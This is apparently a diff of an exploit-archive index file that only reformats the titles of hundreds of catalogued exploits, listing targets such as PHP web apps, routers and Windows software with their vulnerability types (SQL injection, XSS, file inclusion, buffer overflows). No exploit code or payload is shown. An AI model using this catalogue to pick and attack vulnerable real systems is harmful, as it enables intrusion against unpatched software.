29784,platforms/php/remote/29784.php,"PHP 5.2.1 Folded Mail Headers Email Header Injection",2007-11-26,"Stefan Esser",php,remote,0 -29785,platforms/php/remote/29785.txt,"aBitWhizzy whizzypic.php d Variable Traversal Arbitrary Directory Listing",2007-03-14,Lostmon,php,remote,0 -29786,platforms/php/webapps/29786.txt,"aBitWhizzy whizzylink.php d Variable Traversal Arbitrary Directory Listing",2007-03-14,Lostmon,php,webapps,0 +29785,platforms/php/remote/29785.txt,"aBitWhizzy - whizzypic.php d Variable Traversal Arbitrary Directory Listing",2007-03-14,Lostmon,php,remote,0 +29786,platforms/php/webapps/29786.txt,"aBitWhizzy - whizzylink.php d Variable Traversal Arbitrary Directory Listing",2007-03-14,Lostmon,php,webapps,0 29787,platforms/windows/dos/29787.py,"HP Jetdirect FTP Print Server RERT Command Denial of Service",2007-01-18,Handrix,windows,dos,0 29788,platforms/php/remote/29788.php,"PHP 4.4.4 Zip_Entry_Read() Integer Overflow",2007-03-27,"Stefan Esser",php,remote,0 30783,platforms/windows/local/30783.py,"CCProxy 7.3 - Integer Overflow Exploit",2014-01-07,Mr.XHat,windows,local,0 @@ -26859,7 +26859,7 @@ id,file,description,date,author,platform,type,port 30134,platforms/php/webapps/30134.txt,"PHPLive! 3.2.2 help.php Multiple Parameter XSS",2007-06-01,ReZEN,php,webapps,0 30135,platforms/php/webapps/30135.txt,"PHPLive! 3.2.2 - admin/header.php admin[name] Parameter XSS",2007-06-01,ReZEN,php,webapps,0 30136,platforms/php/webapps/30136.txt,"PHPLive! 3.2.2 super/info.php BASE_URL Variable Parameter XSS",2007-06-01,ReZEN,php,webapps,0 -30137,platforms/php/webapps/30137.txt,"PHPLive! 3.2.2 setup/footer.php Multiple Parameter XSS",2007-06-01,ReZEN,php,webapps,0 +30137,platforms/php/webapps/30137.txt,"PHPLive! 3.2.2 - setup/footer.php Multiple Parameter XSS",2007-06-01,ReZEN,php,webapps,0 30138,platforms/php/webapps/30138.txt,"Linker 2.0.4 - Index.php Cross-Site Scripting",2007-06-02,vagrant,php,webapps,0 30139,platforms/multiple/dos/30139.c,"Agnitum Outpost Firewall 4.0 Outpost_IPC_HDR Local Denial of Service",2007-06-04,"Matousec Transparent security",multiple,dos,0 30140,platforms/php/webapps/30140.txt,"Okyanusmedya Index.php Cross-Site Scripting",2007-06-04,vagrant,php,webapps,0 @@ -26878,21 +26878,21 @@ id,file,description,date,author,platform,type,port 30162,platforms/php/webapps/30162.txt,"WMSCMS 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2007-06-07,"Glafkos Charalambous ",php,webapps,0 30163,platforms/multiple/dos/30163.html,"Blue Coat Systems K9 Web Protection 32.36 - Remote Buffer Overflow",2007-06-08,"Dennis Rand",multiple,dos,0 30164,platforms/hardware/remote/30164.txt,"3Com OfficeConnect Secure Router 1.04-168 - Tk Parameter Cross-Site Scripting",2007-06-08,"Secunia Research",hardware,remote,0 -30165,platforms/asp/webapps/30165.txt,"Ibrahim Ã?AKICI Okul Portal Haber_Oku.ASP - SQL Injection",2007-06-08,ertuqrul,asp,webapps,0 +30165,platforms/asp/webapps/30165.txt,"Ibrahim Ã?AKICI - Okul Portal Haber_Oku.ASP SQL Injection",2007-06-08,ertuqrul,asp,webapps,0 30166,platforms/php/webapps/30166.txt,"WordPress 2.2 - Request_URI Parameter Cross-Site Scripting",2007-06-08,zamolx3,php,webapps,0 30167,platforms/hardware/dos/30167.txt,"Packeteer PacketShaper 7.x - Web Interface Remote Denial of Service",2007-06-08,nnposter,hardware,dos,0 30168,platforms/php/webapps/30168.txt,"vBSupport 2.0.0 Integrated Ticket System vBSupport.php SQL Injection",2007-06-09,rUnViRuS,php,webapps,0 -30169,platforms/windows/remote/30169.txt,"WindowsPT 1.2 User ID Key Spoofing",2007-06-11,nnposter,windows,remote,0 +30169,platforms/windows/remote/30169.txt,"WindowsPT 1.2 - User ID Key Spoofing",2007-06-11,nnposter,windows,remote,0 30171,platforms/php/webapps/30171.txt,"JFFNms 0.8.3 - auth.php Multiple Parameter SQL Injection",2007-06-11,"Tim Brown",php,webapps,0 30172,platforms/php/webapps/30172.txt,"JFFNms 0.8.3 - auth.php user Parameter XSS",2007-06-11,"Tim Brown",php,webapps,0 -30173,platforms/php/webapps/30173.txt,"JFFNms 0.8.3 admin/adm/test.php PHP Information Disclosure",2007-06-11,"Tim Brown",php,webapps,0 -30174,platforms/php/webapps/30174.txt,"JFFNms 0.8.3 admin/setup.php Direct Request Authentication Bypass",2007-06-11,"Tim Brown",php,webapps,0 +30173,platforms/php/webapps/30173.txt,"JFFNms 0.8.3 - admin/adm/test.php PHP Information Disclosure",2007-06-11,"Tim Brown",php,webapps,0 +30174,platforms/php/webapps/30174.txt,"JFFNms 0.8.3 - admin/setup.php Direct Request Authentication Bypass",2007-06-11,"Tim Brown",php,webapps,0 30175,platforms/php/webapps/30175.txt,"BBpress 0.8.1 BB-Login.php Cross-Site Scripting",2007-06-11,"Ory Segal",php,webapps,0 30176,platforms/windows/remote/30176.html,"Apple Safari 3 for Windows Protocol Handler Command Injection",2007-06-12,"Thor Larholm",windows,remote,0 30177,platforms/php/webapps/30177.txt,"PlaySms 0.9.9.2 - CSRF",2013-12-10,"Saadi Siddiqui",php,webapps,0 30205,platforms/asp/webapps/30205.txt,"Comersus Cart 7.0.7 Cart comersus_message.asp redirectUrl XSS",2007-06-20,Doz,asp,webapps,0 -30206,platforms/cfm/webapps/30206.txt,"FuseTalk 4.0 forum/include/common/comfinish.cfm FTVAR_SCRIPTRUN Parameter XSS",2007-06-20,"Ivan Almuina",cfm,webapps,0 -30394,platforms/windows/remote/30394.rb,"Adobe Reader ToolButton - Use After Free",2013-12-17,Metasploit,windows,remote,0 +30206,platforms/cfm/webapps/30206.txt,"FuseTalk 4.0 - forum/include/common/comfinish.cfm FTVAR_SCRIPTRUN Parameter XSS",2007-06-20,"Ivan Almuina",cfm,webapps,0 +30394,platforms/windows/remote/30394.rb,"Adobe Reader ToolButton - Use-After-Free",2013-12-17,Metasploit,windows,remote,0 30202,platforms/cfm/webapps/30202.txt,"FuseTalk 2.0/3.0 - AuthError.CFM SQL Injection",2007-06-19,"Ivan Almuina",cfm,webapps,0 30183,platforms/multiple/local/30183.txt,"Air Gallery 1.0 Air Photo Browser - Multiple Vulnerabilities",2013-12-10,Vulnerability-Lab,multiple,local,0 29794,platforms/hardware/webapps/29794.txt,"Pirelli Discus DRG A125g - Remote Change SSID Value",2013-11-24,"Sebastián Magof",hardware,webapps,0 @@ -26900,7 +26900,7 @@ id,file,description,date,author,platform,type,port 29796,platforms/hardware/webapps/29796.pl,"Pirelli Discus DRG A125g - Remote Change WiFi Password",2013-11-24,"Sebastián Magof",hardware,webapps,0 29797,platforms/php/webapps/29797.txt,"MyBB Ajaxfs 2 Plugin - SQL Injection",2013-11-24,"IeDb ir",php,webapps,0 29799,platforms/windows/local/29799.pl,"Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow",2013-11-24,"Mike Czumak",windows,local,0 -29800,platforms/windows/dos/29800.py,"Microsoft Internet Explorer 7.0 HTML Denial of Service",2007-03-28,shinnai,windows,dos,0 +29800,platforms/windows/dos/29800.py,"Microsoft Internet Explorer 7.0 - HTML Denial of Service",2007-03-28,shinnai,windows,dos,0 29801,platforms/php/local/29801.php,"PHP 5.2.1 Session.Save_Path() TMPDIR Open_Basedir Restriction Bypass",2007-03-28,"Stefan Esser",php,local,0 29802,platforms/hardware/webapps/29802.txt,"TPLINK WR740N/WR740ND - Multiple CSRF Vulnerabilities",2013-11-25,"Samandeep Singh",hardware,webapps,0 29803,platforms/windows/dos/29803.pl,"Static Http Server 1.0 - Denial of Service (DoS) Exploit",2013-11-25,GalaxyAndroid,windows,dos,0 @@ -26938,7 +26938,7 @@ id,file,description,date,author,platform,type,port 29838,platforms/php/webapps/29838.txt,"DotClear 1.2.x - /ecrire/trackback.php post_id Parameter XSS",2007-04-11,nassim,php,webapps,0 29839,platforms/php/webapps/29839.txt,"DotClear 1.2.x - /tools/thememng/index.php tool_url Parameter XSS",2007-04-11,nassim,php,webapps,0 29840,platforms/windows/remote/29840.html,"Roxio CinePlayer 3.2 - SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow",2007-04-11,"Carsten Eiram",windows,remote,0 -29841,platforms/php/webapps/29841.txt,"PHPFaber TopSites 3 Admin/Index.php Directory Traversal",2007-04-11,Dr.RoVeR,php,webapps,0 +29841,platforms/php/webapps/29841.txt,"PHPFaber TopSites 3 - Admin/Index.php Directory Traversal",2007-04-11,Dr.RoVeR,php,webapps,0 29842,platforms/cgi/webapps/29842.txt,"Cosign 2.0.1/2.9.4a CGI Check Cookie Command Remote Authentication Bypass",2007-04-11,"Jon Oberheide",cgi,webapps,0 29843,platforms/windows/remote/29843.txt,"webMethods Glue 6.5.1 Console Directory Traversal",2007-04-11,"Patrick Webster",windows,remote,0 29844,platforms/cgi/webapps/29844.txt,"Cosign 2.0.1/2.9.4a CGI Register Command Remote Authentication Bypass",2007-04-11,"Jon Oberheide",cgi,webapps,0 @@ -26959,7 +26959,7 @@ id,file,description,date,author,platform,type,port 29860,platforms/windows/dos/29860.c,"ZoneAlarm 6.1.744.001/6.5.737.000 Vsdatant.SYS Driver Local Denial of Service",2007-04-15,"Matousec Transparent security",windows,dos,0 29861,platforms/php/webapps/29861.txt,"Palo Alto Networks Pan-OS 5.0.8 - Multiple Vulnerabilities",2013-11-27,"Thomas Pollet",php,webapps,0 29862,platforms/php/webapps/29862.pl,"Web Service Deluxe News Manager 1.0.1 Deluxe Footer.php Local File Inclusion",2007-04-16,BeyazKurt,php,webapps,0 -29863,platforms/php/webapps/29863.txt,"Actionpoll 1.1 Actionpoll.php Remote File Inclusion",2007-04-16,SekoMirza,php,webapps,0 +29863,platforms/php/webapps/29863.txt,"Actionpoll 1.1 - Actionpoll.php Remote File Inclusion",2007-04-16,SekoMirza,php,webapps,0 29864,platforms/php/webapps/29864.php,"MyBlog 0.9.8 Settings.php Authentication Bypass",2007-04-16,BlackHawk,php,webapps,0 29865,platforms/php/webapps/29865.txt,"Wabbit Gallery Script 0.9 Showpic.php Multiple Cross-Site Scripting Vulnerabilities",2007-04-17,the_Edit0r,php,webapps,0 29866,platforms/php/webapps/29866.txt,"PHP-Nuke 8.0.3.3b - SQL Injection Protection Bypass / Multiple SQL Injection",2007-04-17,Aleksandar,php,webapps,0 @@ -26973,28 +26973,28 @@ id,file,description,date,author,platform,type,port 29874,platforms/php/webapps/29874.txt,"PHP Turbulence 0.0.1 Turbulence.php Remote File Inclusion",2007-04-20,Omni,php,webapps,0 29875,platforms/multiple/dos/29875.py,"AMSN 0.96 - Malformed Message Denial of Service",2007-04-21,"Levent Kayan",multiple,dos,0 29876,platforms/php/webapps/29876.txt,"TJSChat 0.95 You.php Cross-Site Scripting",2007-04-23,the_Edit0r,php,webapps,0 -29877,platforms/php/webapps/29877.html,"Ripe Website Manager 0.8.4 contact/index.php ripeformpost Parameter SQL Injection",2007-04-23,"John Martinelli",php,webapps,0 +29877,platforms/php/webapps/29877.html,"Ripe Website Manager 0.8.4 - contact/index.php ripeformpost Parameter SQL Injection",2007-04-23,"John Martinelli",php,webapps,0 29878,platforms/php/webapps/29878.txt,"Allfaclassifieds 6.04 Level2.php Remote File Inclusion",2007-04-23,Dr.RoVeR,php,webapps,0 29879,platforms/php/webapps/29879.txt,"PHPMyBibli 1.32 Init.Inc.php Remote File Inclusion",2007-04-23,MoHaNdKo,php,webapps,0 29880,platforms/php/webapps/29880.txt,"File117 - Multiple Remote File Inclusion",2007-04-23,InyeXion,php,webapps,0 29881,platforms/windows/local/29881.txt,"Adobe Acrobat Reader - ASLR/DEP Bypass Exploit with SANDBOX BYPASS",2013-11-28,"w3bd3vil and abh1sek",windows,local,0 29882,platforms/php/webapps/29882.html,"PHPMySpace Gold 8.10 Article.php SQL Injection",2007-04-23,"John Martinelli",php,webapps,0 -29883,platforms/php/webapps/29883.txt,"ACVSWS Transport.php Remote File Inclusion",2007-04-23,MoHaNdKo,php,webapps,0 +29883,platforms/php/webapps/29883.txt,"ACVSWS - Transport.php Remote File Inclusion",2007-04-23,MoHaNdKo,php,webapps,0 29884,platforms/multiple/remote/29884.txt,"Apple Quicktime 7.1.5 QTJava toQTPointer() Java Handling Arbitrary Code Execution",2007-04-23,"Shane Macaulay",multiple,remote,0 29885,platforms/php/webapps/29885.txt,"Claroline 1.x - RootSys Remote File Inclusion",2007-04-23,MoHaNdKo,php,webapps,0 29886,platforms/php/webapps/29886.txt,"Lms 1.5.x - RTMessageAdd.php Remote File Inclusion",2007-04-23,InyeXion,php,webapps,0 -29887,platforms/php/webapps/29887.txt,"Phorum 5.1.20 admin.php Groups Module group_id Parameter XSS",2007-04-23,"Janek Vind",php,webapps,0 -29888,platforms/php/webapps/29888.txt,"Phorum 5.1.20 admin.php modsettings Module smiley_id Parameter XSS",2007-04-23,"Janek Vind",php,webapps,0 +29887,platforms/php/webapps/29887.txt,"Phorum 5.1.20 - admin.php Groups Module group_id Parameter XSS",2007-04-23,"Janek Vind",php,webapps,0 +29888,platforms/php/webapps/29888.txt,"Phorum 5.1.20 - admin.php modsettings Module smiley_id Parameter XSS",2007-04-23,"Janek Vind",php,webapps,0 29889,platforms/php/webapps/29889.txt,"Phorum 5.1.20 - include/controlcenter/users.php Multiple Method Remote Privilege Escalation",2007-04-23,"Janek Vind",php,webapps,0 29890,platforms/php/webapps/29890.txt,"Phorum 5.1.20 - admin.php module[] Variable Path Disclosure",2007-04-23,"Janek Vind",php,webapps,0 29891,platforms/php/webapps/29891.txt,"Phorum 5.1.20 include/admin/banlist.php delete Parameter CSRF Banlist Deletion",2007-04-23,"Janek Vind",php,webapps,0 29892,platforms/php/webapps/29892.html,"Phorum 5.1.20 pm.php Recipient Name SQL Injection",2007-04-23,"Janek Vind",php,webapps,0 -29893,platforms/php/webapps/29893.txt,"Phorum 5.1.20 admin.php badwords/banlist Module SQL Injection",2007-04-23,"Janek Vind",php,webapps,0 -29894,platforms/php/webapps/29894.txt,"Phorum 5.1.20 admin.php Groups Module Edit/Add Group Field SQL Injection",2007-04-23,"Janek Vind",php,webapps,0 +29893,platforms/php/webapps/29893.txt,"Phorum 5.1.20 - admin.php badwords/banlist Module SQL Injection",2007-04-23,"Janek Vind",php,webapps,0 +29894,platforms/php/webapps/29894.txt,"Phorum 5.1.20 - admin.php Groups Module Edit/Add Group Field SQL Injection",2007-04-23,"Janek Vind",php,webapps,0 29895,platforms/php/webapps/29895.txt,"phpMyAdmin 2.9.1 - Multiple Cross-Site Scripting Vulnerabilities",2007-04-24,sp3x@securityreason.com,php,webapps,0 29896,platforms/windows/dos/29896.c,"Cdelia Software ImageProcessing Malformed BMP File Denial of Service",2007-04-24,Dr.Ninux,windows,dos,0 29897,platforms/windows/remote/29897.txt,"Progress 3.1 Webspeed _CPYFile.P Unauthorized Access",2007-04-24,suresync,windows,remote,0 -29898,platforms/php/webapps/29898.txt,"plesk 8.1.1 login.php3 - Directory Traversal",2007-04-25,anonymous,php,webapps,0 +29898,platforms/php/webapps/29898.txt,"plesk 8.1.1 - login.php3 Directory Traversal",2007-04-25,anonymous,php,webapps,0 29899,platforms/php/webapps/29899.txt,"MyNewsGroups 0.6 Include.php Remote File Inclusion",2007-04-25,"Ali and Saeid",php,webapps,0 29900,platforms/multiple/dos/29900.txt,"Asterisk 1.4 SIP T.38 SDP - Parsing Remote Stack Buffer Overflow (1)",2007-03-21,"Barrie Dempster",multiple,dos,0 29901,platforms/multiple/dos/29901.txt,"Asterisk 1.4 SIP T.38 SDP - Parsing Remote Stack Buffer Overflow (2)",2007-03-21,"Barrie Dempster",multiple,dos,0 @@ -27042,14 +27042,14 @@ id,file,description,date,author,platform,type,port 30198,platforms/asp/webapps/30198.txt,"TDizin Arama.ASP Cross-Site Scripting",2007-06-18,GeFORC3,asp,webapps,0 30199,platforms/cgi/webapps/30199.txt,"WebIf OutConfig Parameter Local File Inclusion",2007-06-18,maiosyet,cgi,webapps,0 30059,platforms/php/webapps/30059.py,"Eaton Network Shutdown Module 3.21 - Remote PHP Code Injection",2013-12-06,"Filip Waeytens",php,webapps,0 -29949,platforms/windows/dos/29949.c,"Multiple Vendors Zoo Compression Algorithm Remote Denial of Service",2007-05-04,Jean-Sébastien,windows,dos,0 +29949,platforms/windows/dos/29949.c,"Multiple Vendors - Zoo Compression Algorithm Remote Denial of Service",2007-05-04,Jean-Sébastien,windows,dos,0 29950,platforms/osx/local/29950.js,"Apple 2.0.4 Safari Unspecified Local",2007-05-04,poplix,osx,local,0 29951,platforms/windows/remote/29951.txt,"Microsoft SharePoint Server 3.0 - Cross-Site Scripting",2007-05-04,Solarius,windows,remote,0 29953,platforms/php/webapps/29953.txt,"PHP Content Architect 0.9 pre 1.2 MFA_Theme.php Remote File Inclusion",2007-05-07,kezzap66345,php,webapps,0 29954,platforms/linux/local/29954.txt,"ELinks Relative 0.10.6 - /011.1 Path Arbitrary Code Execution",2007-05-07,"Arnaud Giersch",linux,local,0 29955,platforms/php/webapps/29955.txt,"WF-Quote 1.0 Xoops Module Index.php SQL Injection",2007-05-07,Bulan,php,webapps,0 29956,platforms/php/webapps/29956.txt,"ObieWebsite Mini Web Shop 2 order_form.php PATH_INFO Parameter XSS",2007-05-02,CorryL,php,webapps,0 -29957,platforms/php/webapps/29957.txt,"ObieWebsite Mini Web Shop 2 sendmail.php PATH_INFO Parameter XSS",2007-05-02,CorryL,php,webapps,0 +29957,platforms/php/webapps/29957.txt,"ObieWebsite Mini Web Shop 2 - sendmail.php PATH_INFO Parameter XSS",2007-05-02,CorryL,php,webapps,0 29958,platforms/asp/webapps/29958.txt,"FipsCMS 2.1 PID Parameter SQL Injection",2007-05-07,"ilker Kandemir",asp,webapps,0 29959,platforms/hardware/webapps/29959.txt,"TVT TD-2308SS-B DVR - Directory Traversal",2013-12-01,"Cesar Neira",hardware,webapps,0 29960,platforms/php/webapps/29960.txt,"TurnkeyWebTools SunShop Shopping Cart 4.0 - index.php Multiple Parameter SQL Injection",2007-05-07,"John Martinelli",php,webapps,0 @@ -27057,7 +27057,7 @@ id,file,description,date,author,platform,type,port 29962,platforms/cgi/webapps/29962.txt,"OTRS 2.0.4 - Index.PL Cross-Site Scripting",2007-05-07,ciri,cgi,webapps,0 29963,platforms/php/webapps/29963.txt,"Kayako eSupport 3.0.90 - Index.php Cross-Site Scripting",2007-05-07,Red_Casper,php,webapps,0 29964,platforms/windows/remote/29964.rb,"Trend Micro ServerProtect 5.58 SpntSvc.EXE Remote Stack Based Buffer Overflow",2007-05-07,MC,windows,remote,0 -29965,platforms/php/webapps/29965.txt,"Advanced Guestbook 2.4.2 Picture.php Cross-Site Scripting",2007-05-08,"Jesper Jurcenoks",php,webapps,0 +29965,platforms/php/webapps/29965.txt,"Advanced Guestbook 2.4.2 - Picture.php Cross-Site Scripting",2007-05-08,"Jesper Jurcenoks",php,webapps,0 29966,platforms/php/webapps/29966.txt,"Campsite 2.6.1 - Alias.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 29967,platforms/php/webapps/29967.txt,"Campsite 2.6.1 - Article.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 29968,platforms/php/webapps/29968.txt,"Campsite 2.6.1 - ArticleAttachment.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 @@ -27100,8 +27100,8 @@ id,file,description,date,author,platform,type,port 30009,platforms/windows/remote/30009.rb,"ABB MicroSCADA wserver.exe - Remote Code Execution",2013-12-03,Metasploit,windows,remote,12221 30010,platforms/php/remote/30010.rb,"Kimai 0.9.2 - 'db_restore.php' SQL Injection",2013-12-03,Metasploit,php,remote,80 30011,platforms/windows/remote/30011.rb,"Microsoft Tagged Image File Format (TIFF) Integer Overflow",2013-12-03,Metasploit,windows,remote,0 -30012,platforms/php/webapps/30012.txt,"Chamilo Lms 1.9.6 (profile.php password0 param) - SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 -30013,platforms/php/webapps/30013.txt,"Dokeos 2.2 RC2 (index.php language param) - SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 +30012,platforms/php/webapps/30012.txt,"Chamilo Lms 1.9.6 - (profile.php password0 param) SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 +30013,platforms/php/webapps/30013.txt,"Dokeos 2.2 RC2 - (index.php language param) SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 30062,platforms/hardware/webapps/30062.py,"D-Link DSR Router Series - Remote Root Shell Exploit",2013-12-06,0_o,hardware,webapps,0 30063,platforms/php/webapps/30063.txt,"WordPress Plugin DZS Video Gallery 3.1.3 - Remote File Disclosure / Local File Disclosure",2013-12-06,"aceeeeeeeer .",php,webapps,0 30064,platforms/php/webapps/30064.txt,"HLstats 1.35 HLStats.php Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,"John Martinelli",php,webapps,0 @@ -27121,7 +27121,7 @@ id,file,description,date,author,platform,type,port 30078,platforms/multiple/remote/30078.js,"Apple Safari 2.0.4 - Cross-Domain Browser Location Information Disclosure",2007-05-23,"Gareth Heyes",multiple,remote,0 30079,platforms/php/webapps/30079.txt,"2z Project 0.9.5 - Rating.php Cross-Site Scripting",2007-05-23,"Janek Vind",php,webapps,0 30080,platforms/linux/dos/30080.c,"Linux Kernel 2.6.x - VFat Compat IOCTLS Local Denial of Service",2007-05-24,"Bart Oldeman",linux,dos,0 -30081,platforms/php/webapps/30081.txt,"ASP-Nuke 2.0.7 News.ASP Cross-Site Scripting",2007-05-24,vagrant,php,webapps,0 +30081,platforms/php/webapps/30081.txt,"ASP-Nuke 2.0.7 - News.ASP Cross-Site Scripting",2007-05-24,vagrant,php,webapps,0 30082,platforms/php/webapps/30082.txt,"GNUTurk Mods.php Cross-Site Scripting",2007-05-25,vagrant,php,webapps,0 30083,platforms/php/webapps/30083.txt,"BoxBilling 3.6.11 - (mod_notification) Stored Cross-Site Scripting",2013-12-06,LiquidWorm,php,webapps,0 30084,platforms/php/webapps/30084.php,"WordPress page-flip-image-gallery Plugins - Remote File Upload",2013-12-06,"Ashiyane Digital Security Team",php,webapps,0 @@ -27130,11 +27130,11 @@ id,file,description,date,author,platform,type,port 30088,platforms/php/webapps/30088.txt,"Pligg 9.5 Reset Forgotten Password Security Bypass",2007-05-25,"242th section",php,webapps,0 30089,platforms/linux/remote/30089.txt,"Ruby on Rails 1.2.3 To_JSON - Script Injection",2007-05-25,BCC,linux,remote,0 30091,platforms/linux/dos/30091.py,"OpenOffice 2.2 Writer Component Remote Denial of Service",2007-05-28,shinnai,linux,dos,0 -30095,platforms/php/webapps/30095.txt,"DGNews 1.5.1/2.1 News.php SQL Injection",2007-05-28,"Jesper Jurcenoks",php,webapps,0 +30095,platforms/php/webapps/30095.txt,"DGNews 1.5.1/2.1 - News.php SQL Injection",2007-05-28,"Jesper Jurcenoks",php,webapps,0 30096,platforms/osx/local/30096.txt,"Apple Mac OS X 10.4.9 - VPND Local Format String",2007-05-29,"Chris Anley",osx,local,0 30097,platforms/php/webapps/30097.txt,"UebiMiau 2.7.10 demo/pop3/error.php selected_theme Parameter XSS",2007-05-29,"Michal Majchrowicz",php,webapps,0 30098,platforms/php/webapps/30098.txt,"UebiMiau 2.7.10 demo/pop3/error.php Multiple Variable Path Disclosure",2007-05-29,"Michal Majchrowicz",php,webapps,0 -30099,platforms/php/webapps/30099.txt,"DGNews 2.1 NewsID Parameter SQL Injection",2007-05-28,"laurent gaffie",php,webapps,0 +30099,platforms/php/webapps/30099.txt,"DGNews 2.1 - NewsID Parameter SQL Injection",2007-05-28,"laurent gaffie",php,webapps,0 30101,platforms/php/webapps/30101.txt,"CPCommerce 1.1 Manufacturer.php SQL Injection",2007-05-29,"laurent gaffie",php,webapps,0 30102,platforms/php/webapps/30102.php,"Pheap 2.0 Config.php Pheap_Login Authentication Bypass",2007-05-30,Silentz,php,webapps,0 30103,platforms/php/webapps/30103.txt,"Particle Blogger 1.2.1 Archives.php SQL Injection",2007-03-16,Serapis.net,php,webapps,0 @@ -27165,7 +27165,7 @@ id,file,description,date,author,platform,type,port 30230,platforms/php/webapps/30230.txt,"MyNews 0.10 - AuthACC SQL Injection",2007-06-25,netVigilance,php,webapps,0 30231,platforms/multiple/remote/30231.txt,"Key Focus Web Server 3.1 - Index.WKF Cross-Site Scripting",2007-06-25,"Shay Priel",multiple,remote,0 30232,platforms/php/webapps/30232.txt,"Calendarix 0.7.20070307 - Multiple Cross-Site Scripting Vulnerabilities",2007-06-25,"Jesper Jurcenoks",php,webapps,0 -30233,platforms/windows/dos/30233.pl,"LiteWEB Web Server 2.7 Invalid Page Remote Denial of Service",2007-06-25,Prili,windows,dos,0 +30233,platforms/windows/dos/30233.pl,"LiteWEB Web Server 2.7 - Invalid Page Remote Denial of Service",2007-06-25,Prili,windows,dos,0 30234,platforms/php/webapps/30234.txt,"Calendarix 0.7.20070307 - Multiple SQL Injection",2007-06-25,"Jesper Jurcenoks",php,webapps,0 30235,platforms/php/webapps/30235.txt,"KikChat - (LFI/RCE) Multiple Vulnerabilities",2013-12-12,"cr4wl3r ",php,webapps,0 30237,platforms/hardware/local/30237.sh,"Cisco Unified Communications Manager - TFTP Service",2013-12-12,"daniel svartman",hardware,local,0 @@ -27200,8 +27200,8 @@ id,file,description,date,author,platform,type,port 30271,platforms/java/webapps/30271.txt,"OpManager 6/7 ping.do name Parameter XSS",2007-07-04,Lostmon,java,webapps,0 30272,platforms/java/webapps/30272.txt,"OpManager 6/7 - traceRoute.do name Parameter XSS",2007-07-04,Lostmon,java,webapps,0 30273,platforms/java/webapps/30273.txt,"OpManager 6/7 reports/ReportViewAction.do Multiple Parameter XSS",2007-07-04,Lostmon,java,webapps,0 -30274,platforms/java/webapps/30274.txt,"OpManager 6/7 admin/ServiceConfiguration.do operation Parameter XSS",2007-07-04,Lostmon,java,webapps,0 -30275,platforms/java/webapps/30275.txt,"OpManager 6/7 admin/DeviceAssociation.do Multiple Parameter XSS",2007-07-04,Lostmon,java,webapps,0 +30274,platforms/java/webapps/30274.txt,"OpManager 6/7 - admin/ServiceConfiguration.do operation Parameter XSS",2007-07-04,Lostmon,java,webapps,0 +30275,platforms/java/webapps/30275.txt,"OpManager 6/7 - admin/DeviceAssociation.do Multiple Parameter XSS",2007-07-04,Lostmon,java,webapps,0 30277,platforms/php/webapps/30277.txt,"Maia Mailguard 1.0.2 - Login.php Multiple Local File Inclusion",2007-07-05,"Adriel T. Desautels",php,webapps,0 30278,platforms/windows/remote/30278.c,"SAP DB 7.x - Web Server WAHTTP.EXE Multiple Buffer Overflow Vulnerabilities",2007-07-05,"Mark Litchfield",windows,remote,0 30279,platforms/multiple/remote/30279.txt,"SAP Internet Graphics Server 7.0 PARAms Cross-Site Scripting",2007-07-05,"Mark Litchfield",multiple,remote,0 @@ -27219,10 +27219,10 @@ id,file,description,date,author,platform,type,port 30293,platforms/php/webapps/30293.txt,"Helma 1.5.3 - Search Script Cross-Site Scripting",2007-07-12,"Hanno Boeck",php,webapps,0 30294,platforms/php/webapps/30294.txt,"Inmostore 4.0 - Index.php SQL Injection",2007-07-12,Keniobats,php,webapps,0 30295,platforms/multiple/local/30295.sql,"Oracle Database SQL Compiler Views Unauthorized Manipulation",2007-07-12,bunker,multiple,local,0 -30296,platforms/asp/webapps/30296.txt,"ActiveWeb Contentserver 5.6.2929 Picture_Real_Edit.ASP SQL Injection",2007-07-13,"RedTeam Pentesting",asp,webapps,0 +30296,platforms/asp/webapps/30296.txt,"ActiveWeb Contentserver 5.6.2929 - Picture_Real_Edit.ASP SQL Injection",2007-07-13,"RedTeam Pentesting",asp,webapps,0 30297,platforms/asp/webapps/30297.txt,"contentserver 5.6.2929 errors/rights.asp msg Parameter XSS",2007-07-13,"RedTeam Pentesting",asp,webapps,0 30298,platforms/asp/webapps/30298.txt,"contentserver 5.6.2929 errors/transaction.asp msg Parameter XSS",2007-07-13,"RedTeam Pentesting",asp,webapps,0 -30299,platforms/php/webapps/30299.txt,"ActiveWeb Contentserver 5.6.2929 CMS Client Side Filtering Bypass",2007-07-13,"RedTeam Pentesting",php,webapps,0 +30299,platforms/php/webapps/30299.txt,"ActiveWeb Contentserver 5.6.2929 CMS - Client Side Filtering Bypass",2007-07-13,"RedTeam Pentesting",php,webapps,0 30300,platforms/asp/webapps/30300.txt,"MzK Blog Katgoster.ASP SQL Injection",2007-03-23,GeFORC3,asp,webapps,0 30301,platforms/php/webapps/30301.txt,"Dating Gold 3.0.5 header.php int_path Parameter Remote File Inclusion",2007-07-13,mostafa_ragab,php,webapps,0 30302,platforms/php/webapps/30302.txt,"Dating Gold 3.0.5 footer.php int_path Parameter Remote File Inclusion",2007-07-13,mostafa_ragab,php,webapps,0 @@ -27230,12 +27230,12 @@ id,file,description,date,author,platform,type,port 30393,platforms/win_x86-64/local/30393.rb,"Nvidia (nvsvc) Display Driver Service - Local Privilege Escalation",2013-12-17,Metasploit,win_x86-64,local,0 30383,platforms/php/webapps/30383.txt,"Vikingboard Viking board 0.1.2 cp.php Multiple Parameter XSS",2007-07-25,Lostmon,php,webapps,0 30384,platforms/php/webapps/30384.txt,"Vikingboard Viking board 0.1.2 user.php u Parameter XSS",2007-07-25,Lostmon,php,webapps,0 -30385,platforms/php/webapps/30385.txt,"Vikingboard Viking board 0.1.2 post.php Multiple Parameter XSS",2007-07-25,Lostmon,php,webapps,0 -30386,platforms/php/webapps/30386.txt,"Vikingboard Viking board 0.1.2 topic.php s Parameter XSS",2007-07-25,Lostmon,php,webapps,0 -30387,platforms/php/webapps/30387.txt,"Vikingboard 